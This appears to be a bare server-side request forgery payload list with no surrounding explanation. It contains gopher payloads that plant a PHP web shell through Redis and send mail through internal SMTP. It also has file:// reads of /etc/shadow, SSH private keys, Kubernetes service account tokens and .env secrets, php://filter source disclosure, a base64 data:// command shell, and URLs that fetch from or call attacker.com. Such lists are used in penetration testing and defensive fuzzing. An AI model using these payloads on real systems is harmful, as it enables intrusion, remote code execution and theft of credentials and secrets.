gopher://127.0.0.1:25/_HELO%20localhost%0AMAIL%20FROM%3A%3Cattacker%40evil.com%3E%0ARCPT%20TO%3A%3Cvictim%40target.com%3E%0ADATA%0ASubject%3A%20SSRF%0A%0ATest%0A.%0AQUIT
gopher://127.0.0.1:6379/_SET%20ssrf%20pwned%0AQUIT
gopher://127.0.0.1:6379/_CONFIG%20SET%20dir%20/var/www/html%0ACONFIG%20SET%20dbfilename%20shell.php%0ASET%20payload%20%22%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%0ASAVE%0AQUIT
gopher://127.0.0.1:11211/_stats
gopher://127.0.0.1:3306/_%01%00%00%01%85%a6%03%00%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
gopher://127.0.0.1:5432/_
dict://127.0.0.1:6379/INFO
dict://127.0.0.1:11211/stats
dict://127.0.0.1:6379/CONFIG%20GET%20*
tftp://attacker.com/evil
ldap://127.0.0.1:389
ldap://attacker.com/test
ldaps://attacker.com/test
file:///etc/passwd
file:///etc/shadow
file:///etc/hosts
file:///proc/self/environ
file:///proc/self/cmdline
file:///proc/self/fd/0
file:///proc/net/tcp
file:///proc/net/fib_trie
file:///proc/1/maps
file:///proc/self/cwd/index.php
file:///proc/self/cwd/app.py
file:///proc/self/cwd/.env
file:///var/run/secrets/kubernetes.io/serviceaccount/token
file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt
file:///var/run/secrets/kubernetes.io/serviceaccount/namespace
file:///root/.bash_history
file:///root/.ssh/id_rsa
file:///root/.ssh/authorized_keys
file:///home/user/.ssh/id_rsa
file:///C:/Windows/win.ini
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/inetpub/wwwroot/web.config
expect://id
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/read=convert.base64-encode/resource=index.php
php://input
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
jar://https://attacker.com/evil.jar!/payload.class
netdoc:///etc/passwd
